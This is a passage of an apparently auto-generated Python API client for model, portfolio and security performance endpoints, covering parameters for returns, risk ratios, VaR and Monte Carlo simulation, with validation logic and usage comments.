        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: Stat Type
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_model_performance_using_get_with_http_info(model_id, **kwargs) # noqa: E501
else:
(data) = self.get_model_performance_using_get_with_http_info(model_id, **kwargs) # noqa: E501
return data
def get_model_performance_using_get_with_http_info(self, model_id, **kwargs): # noqa: E501
"""Model Performance # noqa: E501
Get information on the performance of a model using TWR (Time Weighted Return). You must provide the unique model_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_performance_using_get_with_http_info(model_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str model_id: Model Id - /model (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str benchmark_id: Tenant Benchmark Id - /benchmark
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: Stat Type
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['model_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'model_id' is set
if ('model_id' not in params or
params['model_id'] is None):
raise ValueError("Missing the required parameter `model_id` when calling `get_model_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'model_id' in params:
path_params['model_id'] = params['model_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/model/{model_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
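    # Usage sketch (illustrative comment; id and values are placeholders):
    # model TWR with tuned Monte Carlo settings - more simulations, longer
    # paths, and custom percentile bands.
    #
    #   perf = api_instance.get_model_performance_using_get(
    #       'MODEL_UUID',                    # hypothetical model_id
    #       num_sim_monte_carlo=5000,        # default is 1000
    #       n_path_monte_carlo=250,          # points per simulated path
    #       min_percentile_monte_carlo=20,
    #       mean_percentile_monte_carlo=50,
    #       max_percentile_monte_carlo=80)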
def get_portfolio_performance_using_get(self, account_id, client_id, portfolio_id, portfolioid, **kwargs): # noqa: E501
"""Portfolio Performance # noqa: E501
Get information on the performance of a portfolio using IRR (Internal Rate of Return). You must provide the unique portfolio_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_performance_using_get(account_id, client_id, portfolio_id, portfolioid, async_req=True)
>>> result = thread.get()
:param async_req bool
        :param str account_id: Account Id - /account (required)
        :param str client_id: Client Id - /client (required)
        :param str portfolio_id: portfolio_id (required)
        :param str portfolioid: Portfolio Id - /portfolio (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str benchmark_id: Benchmark Id - benchmarkId or clientBenchmarkId - /benchmark
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: A stat type - see the /statistics endpoint for types
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_portfolio_performance_using_get_with_http_info(account_id, client_id, portfolio_id, portfolioid, **kwargs) # noqa: E501
else:
(data) = self.get_portfolio_performance_using_get_with_http_info(account_id, client_id, portfolio_id, portfolioid, **kwargs) # noqa: E501
return data
def get_portfolio_performance_using_get_with_http_info(self, account_id, client_id, portfolio_id, portfolioid, **kwargs): # noqa: E501
"""Portfolio Performance # noqa: E501
Get information on the performance of a portfolio using IRR (Internal Rate of Return). You must provide the unique portfolio_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_performance_using_get_with_http_info(account_id, client_id, portfolio_id, portfolioid, async_req=True)
>>> result = thread.get()
:param async_req bool
        :param str account_id: Account Id - /account (required)
        :param str client_id: Client Id - /client (required)
        :param str portfolio_id: portfolio_id (required)
        :param str portfolioid: Portfolio Id - /portfolio (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str benchmark_id: Benchmark Id - benchmarkId or clientBenchmarkId - /benchmark
        :param date end_date: end date
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: start date
        :param str stat: A stat type - see the /statistics endpoint for types
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'client_id', 'portfolio_id', 'portfolioid', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_portfolio_performance_using_get`") # noqa: E501
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_portfolio_performance_using_get`") # noqa: E501
# verify the required parameter 'portfolio_id' is set
if ('portfolio_id' not in params or
params['portfolio_id'] is None):
raise ValueError("Missing the required parameter `portfolio_id` when calling `get_portfolio_performance_using_get`") # noqa: E501
# verify the required parameter 'portfolioid' is set
if ('portfolioid' not in params or
params['portfolioid'] is None):
raise ValueError("Missing the required parameter `portfolioid` when calling `get_portfolio_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
if 'client_id' in params:
path_params['client_id'] = params['client_id'] # noqa: E501
if 'portfolio_id' in params:
path_params['portfolio_id'] = params['portfolio_id'] # noqa: E501
if 'portfolioid' in params:
path_params['portfolioid'] = params['portfolioid'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/portfolio/{portfolio_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
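    # Usage sketch (illustrative comment; ids are placeholders). The signature
    # requires account_id, client_id, portfolio_id, and portfolioid; all four
    # are placed in path_params, although only portfolio_id appears in the
    # '/portfolio/{portfolio_id}/performance' URL template.
    #
    #   perf = api_instance.get_portfolio_performance_using_get(
    #       'ACCOUNT_UUID',      # hypothetical account_id
    #       'CLIENT_UUID',       # hypothetical client_id
    #       'PORTFOLIO_UUID',    # portfolio_id - substituted into the path
    #       'PORTFOLIO_UUID')    # portfolioid - required by the signature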
def get_security_performance_using_get(self, security_id, **kwargs): # noqa: E501
"""Security Performance # noqa: E501
        Get performance statistics for a security using TWR (Time Weighted Return). You must provide the unique security_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_security_performance_using_get(security_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str security_id: security_id (required)
        :param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - (statId: 19, default: 'D')
        :param str bench_ticker: Benchmark ticker for the security - (default: ^GSPC)
        :param str benchmark_id: benchmark_id
        :param date end_date: End of the time window
        :param float hist_factor: Histogram factor - (statId: 39, default: 5)
        :param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
        :param float max_percentile_monte_carlo: max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
        :param float mean_percentile_monte_carlo: mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
        :param float min_percentile_monte_carlo: min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
        :param int moving_average_n_day: number of days for the n-day moving average - (statId: 18, default: 7)
        :param int n_day_returns: number of days for rolling n-day returns - (statId: 2, default: 7)
        :param int n_path_monte_carlo: number of points per simulation path - (statId: 62, default: 100)
        :param int n_rolling_max_drawdown: number of days for rolling n-day max drawdown - (statId: 46, default: 7)
        :param int n_rolling_volatility: number of days for rolling n-day volatility - (statId: 34, default: 7)
        :param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
        :param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) - case-sensitive codes in parentheses - computes statistics on daily, monthly, quarterly, or annual dates (default: 'D')
        :param float risk_free_alpha: risk-free rate for alpha - (statId: 52, default: 0)
        :param float risk_free_sharpe: risk-free rate for the Sharpe ratio - (statId: 49, default: 0)
        :param float risk_free_sortino: risk-free rate for the Sortino ratio - (statId: 56, default: 0)
        :param float risk_free_treynor: risk-free rate for the Treynor ratio - (statId: 51, default: 0)
        :param date start_date: Start of the time window
        :param str stat: A stat type - /statistics endpoint
        :param str ticker: Ticker for the security
        :param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_security_performance_using_get_with_http_info(security_id, **kwargs) # noqa: E501
else:
(data) = self.get_security_performance_using_get_with_http_info(security_id, **kwargs) # noqa: E501
return data
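# Sketch of the sync/async dispatch implemented above: without async_req the
# call blocks and returns the parsed response body; with async_req=True it
# returns a thread-like handle whose .get() blocks until the result arrives.
# The security_id value below is hypothetical:
#
#     >>> data = api.get_security_performance_using_get('SEC-1')  # synchronous
#     >>> thread = api.get_security_performance_using_get('SEC-1', async_req=True)
#     >>> data = thread.get()  # blocks here until the response is parsed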
def get_security_performance_using_get_with_http_info(self, security_id, **kwargs): # noqa: E501
"""Security Performance # noqa: E501
Get performance statistics for a security using TWR (Time Weighted Return). You must provide the unique security_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_security_performance_using_get_with_http_info(security_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str security_id: security_id (required)
:param str active_premium_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) -- case matters; pass the single-letter code - (statId: 19, default: 'D')
:param str annualized_return_period: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) -- case matters; pass the single-letter code - (statId: 19, default: 'D')
:param str bench_ticker: Benchmark ticker for the security - (default: ^GSPC)
:param str benchmark_id: benchmark_id
:param date end_date: End of the time window
:param float hist_factor: Histogram factor - (statId: 39, default: 5)
:param float mar_down_side_deviation: Minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: Max percentile for Monte Carlo, e.g. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: Mean percentile for Monte Carlo, e.g. 50 - (statId: 62, default: 50)
:param float min_percentile_monte_carlo: Min percentile for Monte Carlo, e.g. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: Number of days for the n-day moving average - (statId: 18, default: 7)
:param int n_day_returns: Number of days for rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: Number of points per simulation path - (statId: 62, default: 100)
:param int n_rolling_max_drawdown: Number of days for rolling n-day max drawdown - (statId: 46, default: 7)
:param int n_rolling_volatility: Number of days for rolling n-day volatility - (statId: 34, default: 7)
:param int num_sim_monte_carlo: Number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarterly (Q), Monthly (M), Annually (Y), Daily (D) -- case matters; computes stats on daily, monthly, quarterly, or annual dates (default: 'D')
:param float risk_free_alpha: Risk-free rate used for alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: Risk-free rate used for Sharpe - (statId: 49, default: 0)
:param float risk_free_sortino: Risk-free rate used for Sortino - (statId: 56, default: 0)
:param float risk_free_treynor: Risk-free rate used for Treynor - (statId: 51, default: 0)
:param date start_date: Start of the time window
:param str stat: A stat type from the /statistics endpoint
:param str ticker: Ticker for the security
:param float var_conf_interval: VaR confidence interval (alpha), e.g. 99 or 95 - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['security_id', 'active_premium_period', 'annualized_return_period', 'bench_ticker', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'ticker', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
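# Snapshot the local names (self, security_id, kwargs, all_params), reject
# any keyword not declared in all_params, then flatten kwargs into params.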
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_security_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'security_id' is set
if ('security_id' not in params or
params['security_id'] is None):
raise ValueError("Missing the required parameter `security_id` when calling `get_security_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'security_id' in params:
path_params['security_id'] = params['security_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'bench_ticker' in params:
query_params.append(('benchTicker', params['bench_ticker'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'ticker' in params:
query_params.append(('ticker', params['ticker'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/security/{security_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
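# The *_with_http_info methods in this module all share the same
# validate-and-dispatch shape. A condensed, illustrative sketch of that
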